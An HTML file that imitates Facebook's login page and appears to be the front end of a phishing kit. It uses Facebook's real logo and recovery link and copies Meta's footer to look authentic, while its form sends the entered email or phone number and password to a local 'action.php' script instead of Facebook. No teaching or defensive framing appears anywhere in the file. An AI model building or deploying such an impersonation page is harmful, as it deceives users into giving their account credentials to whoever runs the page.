<html>
    <head>
        <title>
            Facebook
        </title>
    </head>
    <style>
        body{
            background-color:#f2f4f7;
        }
        .logo1{
            height:100px;
            width:200px;
            margin-top:100px;
            margin-left:530px;
        }
        .parent{
            border:1px solid white;
            width:400px;
            margin-left:420px;
            background-color: white;
            border-radius: 10px;
        }
        h3{
            text-align: center;
            font-family: inherit;;
        }
        button{
            margin-left: 170px;
            border-radius: 5px;
            width:60px;
            background-color: blue;
        }
        #username,#password{
            border:1px solid grey;
            width:50px;
            height:30px;
            border-radius: 5px;
            width:80%;
            margin-left: 40px;
        }
        .fb{
            text-align: center;
            color: blue;
        }
        .lang{
            text-align: center;
        }
        .footer{
            width:100%;
            height:40px;
            margin-top: 10%;
            background-color: white;
        }

    </style>
    <body>
        <div class="logo"><img class="logo1" src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" alt="Facebook"></div>
        <div class="parent">
            <h3>Login to Facebook</h3>
            <form action="action.php">
                <label for="username"></label>
                <input type="email,phone" id="username" name="username" placeholder="Email or phone number" required>
                <br>
                <br>
                <label for="password"></label>
                <input type="password" id="password" name="password" placeholder="Password" required>
                <br>
                <br>
                <button type="submit">Login</button>
                <p class="fb"><a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0&wtsid=rdr_0H6naObaQ1FA00C50">forgot password?</a></p>
            </form>
            <br>
            <br>
        </div>
        <footer class="footer">
            <p class="lang">English ಕನ್ನಡ ردوमराठी తెలుగు हिन्दी தமிழ் മലയാളം বাংলা ગુજરાતી ਪੰਜਾਬੀ </p>
            <hr>
            <footer>
        <nav>
      <ul>
        <li><a href="#">Sign Up</a></li>
        <li><a href="#">Log in</a></li>
        <li><a href="#">Messenger</a></li>
        <li><a href="#">Facebook Lite</a></li>
        <li><a href="#">Video</a></li>
        <li><a href="#">Meta Pay</a></li>
        <li><a href="#">Meta Store</a></li>
        <li><a href="#">Meta Quest</a></li>
        <li><a href="#">Ray-Ban Meta</a></li>
        <li><a href="#">Meta AI</a></li>
        <li><a href="#">Instagram</a></li>
        <li><a href="#">Threads</a></li>
        <li><a href="#">Voting Information Centre</a></li>
        <li><a href="#">Privacy Policy</a></li>
        <li><a href="#">Privacy Centre</a></li>
        <li><a href="#">About</a></li>
        <li><a href="#">Create ad</a></li>
        <li><a href="#">Create Page</a></li>
        <li><a href="#">Developers</a></li>
        <li><a href="#">Careers</a></li>
        <li><a href="#">Cookies</a></li>
        <li><a href="#">AdChoices</a></li>
        <li><a href="#">Terms</a></li>
        <li><a href="#">Help</a></li>
        <li><a href="#">Contact uploading and non-users</a></li>
        <li><a href="#">Settings</a></li>
        <li><a href="#">Activity log</a></li>
      </ul>
    </nav>
    <p>Meta © 2025</p>
        </footer>
    </body>
</html>